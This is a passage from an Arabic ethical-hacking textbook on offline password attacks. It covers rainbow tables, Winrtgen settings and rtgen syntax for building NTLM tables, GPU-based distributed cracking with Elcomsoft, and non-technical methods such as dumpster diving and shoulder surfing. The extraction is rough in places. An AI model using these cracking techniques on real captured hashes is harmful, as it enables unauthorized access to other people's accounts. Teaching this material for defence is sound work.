اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻣﻠف ﻗﺎﺑل ﻟﻠﻘراءة ،ﻓﺎن ھذا ﯾﺻﺑﺢ ﺳﮭل ﺑﺎﻟﻧﺳﺑﺔ ﻟﮫ أو ﻟﮭﺎ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم .وﺑﺎﻟﺗﺎﻟﻲ ،ﯾﺟب أن ﺗﻛون ﻗﺎﺋﻣﺔ
ﻛﻠﻣﺎت اﻟﻣرور ﻣﺣﻣﯾﮫ واﻻﺣﺗﻔﺎظ ﺑﮭﺎ ﻓﻲ ﺷﻛل ﻏﯾر ﻗﺎﺑل ﻟﻠﻘراءة ،ﻣﺛل اﻟﺷﻛل اﻟﻣﺷﻔر Offline Attack .ھﻲ ھﺟﻣﺎت ﻣﺿﯾﻌﺔ ﻟﻠوﻗت .ﻛﺎﻧت
ﻣن ﻗﺑل ﻧﺎﺟﺣﺔ ﻷن LM hashﯾﻣﻠك ﻧﻘطﺔ ﺿﻌف وھﻲ ﺻﻐر وﻗﺻر طول . keyspaceوﺗﺗوﻓر ﺗﻘﻧﯾﺎت ﻣﺧﺗﻠﻔﺔ ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور ﻋﻠﻰ
ﺷﺑﻛﺔ اﻻﻧﺗرﻧت.
ھﻧﺎك ﻧوﻋﺎن ﻣن ھﺟﻣﺎت Offline Attackاﻟﺗﻲ ﯾﺳﺗﺧدﻣﺎه اﻟﻣﮭﺎﺟم ﻻﻛﺗﺷﺎف ﻛﻠﻣﺎت اﻟﻣرور.
Rainbow Attacks -
Distributed network Attacks -
Rainbow Attacks
Rainbow attackھو ﺗﻧﻔﯾذ ﻟﺗﻘﻧﯾﺔ Cryptanalytic time-memory trade-off .cryptanalytic time-memory trade-off
ھو اﻷﺳﻠوب اﻟذي ﯾﺗطﻠب وﻗﺗﺎ أﻗل ﻟﺗﺣﻠﯾل اﻟﺷﻔرات .ﻓﺈﻧﮫ ﯾﺳﺗﺧدم ﺑﺎﻟﻔﻌل ﺣﺳﺎب اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧزﻧﺔ ﻓﻲ اﻟذاﻛرة ﻟﻛﺳر اﻟﺗﺷﻔﯾر .ﻓﻲ ھﺟوم
،Rainbow attackﯾﺳﺗﺧدم ﻧﻔس اﻷﺳﻠوب؛ ﺣﯾث ﯾﺗم إﻧﺷﺎء ﺑطرﯾﻘﮫ ﻣﺗﻘدﻣﺔ ﺟدول ﯾﺣﺗوي ﻋﻠﻰ ھﺎش ﻟﻛﻠﻣﺎت ﻣرور ﺳﺎﺑﻘﮫ وﺗﺧزﯾﻧﮭﺎ ﻓﻲ
اﻟذاﻛرة .وﯾﺳﻣﻰ ﻣﺛل ھذا اﻟﺟدول "." rainbow table
Rainbow Table
Rainbow tableھو ﺟدول ﺑﺣث اﺳﺗﺧدم ﺧﺻﯾﺻﺎ ﻓﻲ اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﻣرور ﻟﻧص ﻋﺎدي ﻣن ﻧص ﻣﺷﻔر) . (cipher textﯾﺳﺗﺧدم
اﻟﻣﮭﺎﺟم ھذا اﻟﺟدول ﻓﻲ اﻟﺑﺣث ﻋن ﻛﻠﻣﺔ اﻟﻣرور وﯾﺣﺎول اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﻣرور ﻣن ھﺎش ﻛﻠﻣﺔ اﻟﺳر.
Computed Hashes
اﻟﻣﮭﺎﺟم ﯾﺣﺳب اﻟﮭﺎش ﻟﻠﺣﺻول ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ ،ﺛم ﯾﻘﺎرن ذﻟك ﻣﻊ ﺟدول ھﺎش ﻣﺣﺳوب ﻣن ﻗﺑل ).(Rainbow table
إذا ﺗم اﻟﻌﺛور ﻋﻠﻰ ﺗطﺎﺑﻖ ،إذا ﻓﺎن ﻛﻠﻣﺔ اﻟﻣرور ﺗم ﺣﻠﮭﺎ.
Compare the Hashes
ﻣن اﻟﺳﮭل اﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﻣرور ﻣن ﺧﻼل ﻣﻘﺎرﻧﺔ ھﺎش اﻟﻛﻠﻣﺔ اﻟﺗﻲ اﺳﺗوﻟﯾت ﻋﻠﯾﮭﺎ ﺑﺟدول ﻣﺣﺳوب ﻣﺳﺑﻘﺎ). (pre-computed tables
Pre-Computed Hashes
ﯾﺟب أن ﯾﺗم ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة ﻓﻘط ﻓﻲ ﻣﻠف ﯾﺣﺗوي ﻋﻠﻰ اﺳم اﻟﻣﺳﺗﺧدم /ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺷﻔرة .ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ
أﺛﻧﺎء ﻋﻣﻠﯾﺔ ﺗﺳﺟﯾل اﻟدﺧول ﯾﺗم ﺗﺷﻔﯾرھﺎ ﺑﺎﺳﺗﺧدام وظﯾﻔﺔ اﻟﮭﺎش ﻟﻠﺗﺷﻔﯾر ،وﯾﺗم ﺑﻌد ذﻟك ﻣﻘﺎرﻧﺔ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ اﻟﻣﻠف.
ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة اﻟﺗﻲ ﯾﺗم ﺗﺧزﯾﻧﮭﺎ ﯾﻣﻛﻧﮭﺎ اﺛﺑﺎت اﻧﮭﺎ ﻋدﯾﻣﺔ اﻟﺟدوى ﺿد ھﺟﻣﺎت اﻟﻘﺎﻣوس) . (dictionary attacksإذا ﻛﺎن اﻟﻣﻠف
اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺔ ﻣرور اﻟﻣﺷﻔرة ﻓﻲ ﺷﻛل ﻣﻘروء ،ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺑﺳﮭوﻟﺔ اﻛﺗﺷﺎف وظﯾﻔﺔ اﻟﮭﺎش .وﻣن ﺛم ﯾﻣﻛﻧﮫ ﻓك ﺗﺷﻔﯾر ﻛل اﻟﻛﻠﻣﺎت
اﻟﻣوﺟودة ﻓﻲ اﻟﻘﺎﻣوس ﺑﺎﺳﺗﺧدام داﻟﺔ اﻟﮭﺎش ،وﻣن ﺛم ﻣﻘﺎرﻧﺗﮭﺎ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور ﻣﺷﻔرة .وﺑﺎﻟﺗﺎﻟﻲ ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﺣﺻل ﻋﻠﻰ ﺟﻣﯾﻊ ﻛﻠﻣﺎت اﻟﺳر
اﻟﺗﻲ ھﻲ ﻋﺑﺎرة ﻋن ﻛﻠﻣﺎت ﻣدرﺟﺔ ﻓﻲ اﻟﻘﺎﻣوس.
ﺗﺧزﯾن اﻟﮭﺎش ﯾﺗطﻠب ﻣﺳﺎﺣﺔ ذاﻛرة ﻛﺑﯾرة ﻣﺛل LM hashواﻟذي ﯾﺣﺗﺎج 310ﺗﯾراﺑﺎﯾت وﻛذﻟك 15> NT hashﺣرف ﯾﺗطﻠب
5652897009إﻛﺳﺎ ﺑﺎﯾت .اﺳﺗﺧدام ﺗﻘﻧﯾﺔ time-space tradeoff techniqueوذﻟك ﻟﻠﺣد ﻣن ﻣﺳﺎﺣﺔ اﻟذاﻛرة اﻟﻣطﻠوﺑﺔ ﻟﺗﺧزﯾن اﻟﮭﺎش.
اﻟﻣﺻدرhttp://www.oxid.it/projects.html :
Winrtgenھو اداه رﺳوﻣﯾﺔ ﻷﻧﺷﺎء ﺟداول Rainbow Tablesواﻟﺗﻲ ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟﻣﯾن ﺣﯾث ﻣن ﺧﻼﻟﮭﺎ ﯾﻣﻛن ﻛﺳر ھﺎش ﻛﻠﻣﺔ اﻟﻣرور.
وھو ﯾدﻋم اﻟﮭﺎﺷﺎت اﻟﺗﺎﻟﯾﺔ:
LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5,
SHA1, RIPEMD160, MySQL323, MySQLSHA1, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384) and
SHA-2 (512) hashes
طرﯾﻘﺔ اﻟﻌﻣل:
-1ﻧﻘوم ﺑﺎﻟﻧﻘر اﻟﻣزدوج ﻋﻠﻰ ﺗطﺑﯾﻖ اﻟﺑرﻧﺎﻣﺞ Winrtgen.exeﻓﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ:
-3ﻓﻲ اﻟﺷرﯾط اﻟﻌﻠوي ﻋﻧد اﻟﻘﯾم HASHﻧﺟد اﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺎﻟﮭﺎش اﻟذي ﯾدﻋﻣﮫ ﻓﻲ ﻣﺛﺎﻟﻧﺎ ھذا ﺳو ﻧﺧﺗﺎر ntlmﺛم ﺗﺣت
اﻟﻌﻧوان Min Lenواﻟﺗﻲ ﺗﻌﺑر ﻋن اﻗل طول ﻟﻠﮭﺎش ﻧﺧﺗﺎر 4و Max Lenﻧﺧﺗﺎر 9اﻣﺎ ﺗﺣت chain countﻧﺧﺗﺎر .4000000
-4ﻓﻲ اﻟﺧﺎﻧﺔ اﻟﻣﻘﺎﺑﻠﺔ ﻟﻠﻌﻧوان Charsetﻧﺧﺗﺎر loweralphaواﻟﺗﻲ ﺗﻌﻧﻰ اﻟﺣروف اﻟﺻﻐﯾرة وھذا ﻋﻠﻰ ﺣﺳب ﻧوع ﻛﻠﻣﺔ اﻟﻣرور.
اﻟﻣﺻدرhttp://www.project-rainbowcrack.com :
Rainbowcrackھو ﺗﻧﻔﯾذ ﻻﻗﺗراح ﻋﺎم واﻟذى ﯾﺳﺗﻔﯾد ﻣن ﺗﻘﻧﯾﺔ time-memory trade-off techniqueﻟﻛﺳر اﻟﮭﺎش .ﯾﺳﻣﺢ ھذا
اﻟﻣﺷروع ﻟك ﻛﺳر ھﺎش ﻛﻠﻣﺔ اﻟﻣرور .ﯾﺗم اﺳﺗﺧدام أداة rtgenاﻟﻣﺗوﻓرة ﻓﻲ ھذا اﻟﻣﺷروع ﻟﺗوﻟﯾد ﺟداول .Rainbow tableﯾﺣﺗﺎج rtgen
اﻟﻌدﯾد ﻣن اﻟﻣﻌﺎﻣﻼت ﻟﺗوﻟﯾد ﺟدول Rainbow table؛ ﯾﻣﻛﻧك اﺳﺗﺧدام ﺑﻧﺎء اﻟﺟﻣﻠﺔ اﻟﺗﺎﻟﻲ ﻣن ﺳطر اﻷواﻣر ﻟﺗوﻟﯾد ﺟداول :Rainbow table
ھذا اﻟﺗطﺑﯾﻖ ﻟﻧظﺎﻣﻲ اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس ووﯾﻧدوز .اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻟﺳطر اﻷواﻣر ﻛﺎﻻﺗﻰ:
#rtgen©hash_algorithm©charset©plaintext_len_min©plaintext_len_max©table_index©chain_len
chain_num©part_index
اﻟوظﺎﺋف اﻟﺣﺎﻟﯾﺔ) : (Current jobsھﻲ ﻋﺑﺎره ﻋن ﻗﺎﺋﻣﺔ اﻧﺗظﺎر ﻟﺟﻣﯾﻊ اﻟوظﺎﺋف اﻟﺣﺎﻟﯾﺔ اﻟﺗﻲ ﺗم إﺿﺎﻓﺗﮭﺎ ﻣن ﻗﺑل وﺣدة ﺗﺣﻛم .ﻗﺎﺋﻣﺔ
اﻟوظﺎﺋف اﻟﺣﺎﻟﯾﺔ ) (Current jobs listﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻷﻋﻣدة ،ﻣﺛل رﻗم اﻟﮭوﯾﺔ ) (IDاﻟﺗﻲ ﺗم ﺗﻌﯾﯾﻧﮭﺎ ﻣن ﻗﺑل DNAﻟﻛل وظﯾﻔﺔ ،واﺳم
اﻟﻣﻠف اﻟﻣﺷﻔر ،وﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ،وﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗطﺎﺑﻖ اﻟﻣﻔﺗﺎح اﻟذي ﯾﻣﻛن أن ﯾﻔﺗﺢ اﻟﺑﯾﺎﻧﺎت ،ووﺿﻊ ھذه
اﻟﻣﮭﻣﺔ ،وأﻋﻣدة أﺧرى ﻣﺧﺗﻠﻔﺔ.
اﻟوظﺎﺋف اﻟﻣﻧﺗﮭﯾﺔ ) :(Finished jobsﺗوﻓر ﻗﺎﺋﻣﺔ اﻟوظﺎﺋف اﻟﻣﻧﺗﮭﯾﺔ ) (Finished jobs listاﻟﻣﻌﻠوﻣﺎت ﺣول اﻟوظﺎﺋف اﻟﺗﻲ ﯾﻣﻛن ﻓك
ﺗﺷﻔﯾرھﺎ ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺔ اﻟﻣرور .ﻗﺎﺋﻣﺔ اﻟوظﺎﺋف اﻟﻣﻧﺗﮭﯾﺔ ﻟدﯾﮫ أﯾﺿﺎ اﻟﻌدﯾد ﻣن اﻷﻋﻣدة اﻟﺗﻲ ﺗﺷﺑﮫ ﻗﺎﺋﻣﺔ اﻟوظﺎﺋف اﻟﺣﺎﻟﯾﺔ .ﺗﺷﻣل ھذه اﻷﻋﻣدة
اﻟرﻗم اﻟﺗﻌرﯾﻔﻲ اﻟﻣﻌﯾن ﻣن ﻗﺑل DNAﻟﮭذه اﻟوظﯾﻔﺔ ،واﺳم اﻟﻣﻠف اﻟﻣﺷﻔر ،ﻣﺳﺎر ﻓك اﻟﻣﻠف ،واﻟﻣﻔﺗﺎح اﻟﻣﺳﺗﺧدم ﻓﻲ اﻟﺗﺷﻔﯾر وﻓك
https://www.facebook.com/tibea2004 د .ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ
332
ﺗﺷﻔﯾر اﻟﻣﻠف ،اﻟﺗﺎرﯾﺦ واﻟوﻗت اﻟذي اﺗﺧذه ﺧﺎدم DNAﻟﻠﻌﻣل ﻋﻠﻰ اﻟوظﯾﻔﺔ ،اﻟﺗﺎرﯾﺦ واﻟوﻗت اﻟذي اﺗﺧذه ﺧﺎدم DNAﻟﻼﻧﺗﮭﺎء ﻣن اﻟﻌﻣل ﻋﻠﻰ
وظﯾﻔﺔ ،واﻟوﻗت اﻟﻣﻧﻘﺿﻰ ،اﻟﺦ.
اﻟﻣﺻدرhttp://www.elcomsoft.com :
Elcomsoft Distributed Password Recoveryﯾﺳﻣﺢ ﻟك ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﻌﻘدة ،واﺳﺗﻌﺎدة ﻣﻔﺎﺗﯾﺢ اﻟﺗﺷﻔﯾر اﻟﻘوﯾﺔ ،و ﻓﺗﺢ
اﻟﻣﺳﺗﻧدات ﻓﻲ ﺑﯾﺋﺔ اﻹﻧﺗﺎج .ﻷﻧﮭﺎ ﺗﺗﯾﺢ ﺗﻧﻔﯾذ اﻛواد ﻣﻛﺛﻔﺔ ﺣﺳﺎﺑﯾﺎ ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر اﻟﻣوازﯾﺔ ﺣﺳﺎﺑﯾﺎ ﺑﺷﻛل ﻛﺑﯾر ﻟﻠﻌﻧﺎﺻر اﻟﻣوﺟودة ﻓﻲ
ﻣﺳرﻋﺎت اﻟرﺳوﻣﺎت اﻟﺣدﯾﺛﺔ .ھذه اﻟﺗﻘﻧﯾﺔ ﻣﺑﺗﻛرة ﻟﺗﺳرﯾﻊ اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر ﻋﻧد وﺟود ﺑطﺎﻗﺔ رﺳوﻣﯾﮫ ATIأو NVIDIAﻣوﺟودة وﻣﺗواﻓﻘﺔ
ﺑﺎﻹﺿﺎﻓﺔ ﻣﻊ وﺿﻊ وﺣدة اﻟﻣﻌﺎﻟﺟﺔ اﻟﻣرﻛزي ﻓﻘط .ﺑﺎﻟﻣﻘﺎرﻧﺔ ﻣﻊ طرق اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗﺳﺗﺧدم ﻓﻘط وﺣدة اﻟﻣﻌﺎﻟﺟﺔ اﻟﻣرﻛزﯾﺔ اﻟرﺋﯾﺳﯾﺔ
ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ،وﺗﺳرﯾﻊ GPUاﻟﻣﺳﺗﺧدﻣﺔ ﻣن ﻗﺑل ھذه اﻟﺗﻛﻧوﻟوﺟﯾﺎ ﯾﺟﻌل اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر ﺑﺷﻛل أﺳرع .ھذا ﯾدﻋم اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر
ﻟﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟﺗطﺑﯾﻘﺎت وﺗﻧﺳﯾﻘﺎت اﻟﻣﻠﻔﺎت.
ﻣﻠﺣوظﮫ :ھذا اﻟﺗطﺑﯾﻖ ھو ﻣﺛﺎل Distributed Network Attacksوﻟﻛن ﺑﺎﻹﺿﺎﻓﺔ اﻟﻰ اﻋﺗﻣﺎده ﻋﻠﻰ وﺣدة اﻟﻣﻌﺎﻟﺞ اﻟﻣرﻛزي ﻓﺎﻧﮫ
ﯾﻌﺗﻣد ﻋﻠﻰ ﻣﻌﺎﻟﺞ ﻛروت اﻟﺷﺎﺷﺔ اﻟﺣدﯾﺛﺔ GPUأﯾﺿﺎ.
اﻟﻣﯾزات :ﻓواﺋد
-1ﯾﻘﻠل ﻣن اﻟوﻗت اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر.
Distributed password recovery -2ﻋﻠﻰ ،LANاﻹﻧﺗرﻧت ،أو ﻛﻠﯾﮭﻣﺎ.
Solace management -3ﻟﺳﮭوﻟﺔ اﻟﺳﯾطرة ﻣن أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﻣﺗﺻل ﺑﺎﻟﺷﺑﻛﺔ.
Plug-in architecture -4ﯾﺳﻣﺢ ﻟﺗﻧﺳﯾﻘﺎت اﻟﻣﻠﻔﺎت إﺿﺎﻓﯾﺔ.
-5اﻟﺗﺣﻛم اﻟﻣرن ﻓﻲ ﻗﺎﺋﻣﺔ اﻻﻧﺗظﺎر ﯾﺗﯾﺢ إدارة اﻟوظﺎﺋف ﺑﺳﮭوﻟﮫ.
-6ﺗﺛﺑﯾت وإزاﻟﺔ ﻋﻣﻼء اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر ﻋن ﺑﻌد.
Non-Electronic Attacks
اﻟﮭﺟﻣﺎت ﻏﯾر اﻹﻟﻛﺗروﻧﯾﺔ Non-Electronic Attacksﯾطﻠﻖ ﻋﻠﯾﮭﺎ أﯾﺿﺎ ھﺟﻣﺎت ﻏﯾر ﺗﻘﻧﯾﺔ . Non-Technical Attacksھذا اﻟﻧوع
ﻣن اﻟﮭﺟﻣﺎت ﻻ ﯾﺗطﻠب أي ﻣﻌرﻓﺔ ﺗﻘﻧﯾﺔ ﺣول طرق اﻟﺗدﺧل ﻣﻊ ﻧظﺎم آﺧر .وﺑﺎﻟﺗﺎﻟﻲ ،ﻓﺈﻧﮫ ﯾدﻋﻰ ھﺟوم ﻏﯾر إﻟﻛﺗروﻧﯾﺔ .ھﻧﺎك أرﺑﻌﺔ أﻧواع ﻣن
اﻟﮭﺟﻣﺎت ﻏﯾر اﻹﻟﻛﺗروﻧﯾﺔ ،واﻟﺗﻲ ھﻲ(Dumpster Diving، Keyboard Sniffing، Shoulder Surfing،Social Engineering) :
Dumpster Divingھو وﺳﯾﻠﺔ اﻟﮭﺟوم اﻟرﺋﯾﺳﯾﺔ اﻟﺗﻲ ﺗﺳﺗﮭدف ﺑﻧﺎ ًء ﻋﻠﻰ ﻓﺷل ﻛﺑﯾر ﻓﻲ أﻣن اﻟﻛﻣﺑﯾوﺗر :اﻟﻣﻌﻠوﻣﺎت اﻟﻣﮭم ﺟدا اﻟذى ﯾﺳﻌﻰ
اﻟﻧﺎس ﻟﺣﻣﺎﯾﺗﮭﺎ واﻣﻧﮭﺎ ،ﯾﻣﻛن اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻣن ﻗﺑل أي ﺷﺧص ﺗﻘرﯾﺑﺎ ﻋﻠﻰ اﺳﺗﻌداد ﻟﻠﺗدﻗﯾﻖ ﻓﻲ اﻟﻘﻣﺎﻣﺔ .ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت
ﺣول ﻛﻠﻣﺎت اﻟﻣرور اﻟﮭدف ﻋن طرﯾﻖ اﻟﻧظر ﻣن ﺧﻼل ﺳﻠﺔ اﻟﻣﮭﻣﻼت .ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم low-tech attackﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻵﺛﺎر.
ﻧظرا ﻻﻧﺧﻔﺎض ﻣﺳﺗوى اﻷﻣن ﻋن ھذه اﻻﯾﺎم ،ﻓﻛﺎن ﻓﻲ اﻟواﻗﻊ Dumpster Divingذات ﺷﻌﺑﯾﺔ ﻛﺑﯾرة ﻓﻲ .1980ﻣﺻطﻠﺢ "
" Dumpster Divingﯾﺷﯾر إﻟﻰ أي ﻣن اﻟﻣﻌﻠوﻣﺎت ﺳواء اﻟﻌﺎﻣﺔ او اﻟﻣﻔﯾدة اﻟﺗﻲ وﺟدت او اﺧذت ﻣن اﻟﻣﻧﺎطﻖ ﺣﯾث ﯾﺗم اﻟﺗﺧﻠص ﻣﻧﮭﺎ.
وﺗﺷﻣل ھذه اﻟﻣﻧﺎطﻖ ﺻﻔﺎﺋﺢ اﻟﻘﻣﺎﻣﺔ وﺣﺎوﯾﺎت اﻟرﺻﯾف ،ﻣﻛﺑﺎت اﻟﻧﻔﺎﯾﺎت ،وﻣﺎ ﺷﺎﺑﮫ ذﻟك ،اﻟﺗﻲ ﯾﻣﻛن ﻣن ﺧﻼﻟﮭﺎ اﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت
ﻣﺟﺎﻧﺎ .ﻗد ﺗﺟد ﻣﻠﻔﺎت ﻛﻠﻣﺔ اﻟﺳر واﻷدﻟﺔ واﻟوﺛﺎﺋﻖ اﻟﺣﺳﺎﺳﺔ ،واﻟﺗﻘﺎرﯾر ،واﻹﯾﺻﺎﻻت ،وأرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن ،أو اﻷﻗراص اﻟﺗﻲ أﻟﻘﯾت ﺑﻌﯾدا.
ﺑﺑﺳﺎطﺔ ،ﻓﺣص اﻟﻧﻔﺎﯾﺎت اﻟﺗﻲ ﺗم إﻟﻘﺎﺋﮭﺎ ﻓﻲ اﻟﻘﻣﺎﻣﺔ ﻗد ﺗﻛون ﻣﻔﯾدة ﻟﻠﻣﮭﺎﺟﻣﯾن ،وھﻧﺎك ﻣﻌﻠوﻣﺎت واﻓرة ﻟدﻋم ھذا اﻟﻣﻔﮭوم .ﻣﺛل اﻟﻣﻌﻠوﻣﺎت اﻟﻣﻔﯾدة
اﻟﺗﻲ أﻟﻘﯾت ﺑدون أي ﺗﻔﻛﯾر اﻟﻰ أي ﻣن اﻷﯾدي اﻟﺗﻲ ﻗد ﯾﻧﺗﮭﻲ اﻟﯾﮭﺎ .ھذه اﻟﺑﯾﺎﻧﺎت ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن ﻟﻠوﺻول ﻏﯾر اﻟﻣﺻرح ﺑﮫ
اﻟﻰ أﻧظﻣﺔ اﻟﻛﻣﺑﯾوﺗر اﻵﺧرﯾن ،أو ﯾﻣﻛن اﻷﺷﯾﺎء اﻟﺗﻲ ﯾﻌﺛر ﻋﻠﯾﮭﺎ ﯾدﻓﻊ اﻟﻰ أﻧواع أﺧرى ﻣن اﻟﮭﺟﻣﺎت ﻣﺛل اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ.
Shoulder Surfingﻋﻧدھﺎ ﯾﻛون اﻟﻣﺗﺳﻠل واﻗف ﺑﺻورة ﻏﯾر واﺿﺣﺔ ،وﻟﻛن ﺑﺎﻟﻘرب ﻣن اﻟﻣﺳﺗﺧدم اﻟﺷرﻋﻲ ﻟﻠﻧظﺎم ،وﻣﺷﺎھدة ﻛﯾف ﯾﺗم
إدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور .اﻟﻣﮭﺎﺟم ﺑﺑﺳﺎطﺔ ﯾﻧظر إﻟﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﺳواء ﻟﻠﻣﺳﺗﺧدم أو اﻟﺷﺎﺷﺔ ﺑﯾﻧﻣﺎ ھو ﯾﺳﺟل اﻟدﺧول ،وﯾراﻗب ﻟﯾرى ﻣﺎ إذا ﻛﺎن
اﻟﻣﺳﺗﺧدم ﯾﺣدق ﻓﻲ اﻟﻣﻛﺗب ﻟﯾﺗذﻛر ﻛﻠﻣﺔ اﻟﻣرور أو ﻛﻠﻣﺔ اﻟﻣرور اﻟﻔﻌﻠﯾﺔ .ھذا ﯾﻣﻛن أن ﯾﻛون ﻣﻣﻛﻧﺎ ﻓﻘط ﻋﻧدﻣﺎ ﯾﻛون اﻟﻣﮭﺎﺟم ھو ﺟﺳدﯾﺎ ﻗرﯾب
ﻣن اﻟﮭدف .ﯾﻣﻛن أن ﯾﺣدث ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم أﯾﺿﺎ ﻓﻲ ﻣﺣل اﻟﺑﻘﺎﻟﺔ ﻋﻧد ﺧط اﻟﺧروج ﻋﻧدﻣﺎ ﯾﻘوم اﻟﺿﺣﯾﺔ اﻟﻣﺣﺗﻣﻠﺔ ﺑﺗﻣرﯾر ﺑطﺎﻗﺔ اﻟﺳﺣب
اﻵﻟﻲ وإدﺧﺎل PINاﻟﻣطﻠوﺑﺔ .اﻟﻌدﯾد ﻣن ارﻗﺎم اﻟﮭوﯾﺔ اﻟﺷﺧﺻﯾﺔ ھذه ھﻲ ﻋﺑﺎره ﻋن أرﺑﻌﺔ ارﻗﺎم ﻓﻘط.
ﯾﺷﯾر اﻟﺗﻧﺻت ) (Eavesdroppingﻋﻠﻰ ﻓﻌل اﻻﺳﺗﻣﺎع ﺳرا ﻟﻣﺣﺎدﺛﺔ ﺷﺧص ﻣﺎ .ﯾﻣﻛن ﺗﺣدﯾد ﻛﻠﻣﺎت اﻟﺳر ﻣن ﺧﻼل اﻻﺳﺗﻣﺎع ﺳرا ﻟﺗﺑﺎدﻻت
ﻛﻠﻣﺔ اﻟﻣرور .إذا ﻓﺷل اﻟﮭﺎﻛر ﻓﻲ اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﻋن طرﯾﻖ اﻟﺗﺧﻣﯾن ،ﻓﮭﻧﺎك طرق أﺧرى ﯾﻣﻛﻧﮫ اﻟﻣﺣﺎوﻟﺔ ﻟﻠﺣﺻول ﻋﻠﯾﮫ.
" " Password sniffingھو ﺑدﯾل ﻣﺳﺗﺧدم ﻣن ﻗﺑل اﻟﻣﺗﺳﻠﻠﯾن ﻟﻠﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺳﺗﮭدﻓﺔ.
ﻣﻌظم اﻟﺷﺑﻛﺎت ﺗﺳﺗﺧدم ﺗﻘﻧﯾﺔ اﻟﺑث ) ،(Broadcast technologyﻣﻣﺎ ﯾﻌﻧﻲ أن ﻛل رﺳﺎﻟﺔ ﯾﻘوم اﻟﻛﻣﺑﯾوﺗر ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﺑﻧﻘﻠﮭﺎ ﯾﻣﻛن ﻗراءﺗﮭﺎ
ﻣن ﻗﺑل أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﻣﺗﺻل ﻋﻠﻰ ﺗﻠك اﻟﺷﺑﻛﺔ .ﻓﻲ اﻟﻣﻣﺎرﺳﺔ اﻟﻌﻣﻠﯾﺔ ،ﻣﺎ ﻋدا ﻣﺳﺗﻠم اﻟرﺳﺎﻟﺔ ،ﻓﺈن ﻛل أﺟﮭزة ﻛﻣﺑﯾوﺗر ﻣوﺟود ﻋﻠﻰ اﻟﺷﺑﻛﺔ
ﯾﻼﺣظ ان اﻟرﺳﺎﻟﺔ ﻏﯾر ﻣوﺟﮫ اﻟﯾﮫ ،وﯾﺗﺟﺎھﻠﮭﺎ .وﻣﻊ ذﻟك ،ﻓﺄن أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﯾﻣﻛن ﺑرﻣﺟﺗﮭﺎ ﻟﻠﻧظر ﻓﻲ ﻛل رﺳﺎﻟﺔ اﻟﺗﻲ ﺗﻧﺗﻘل ﻋن طرﯾﻖ
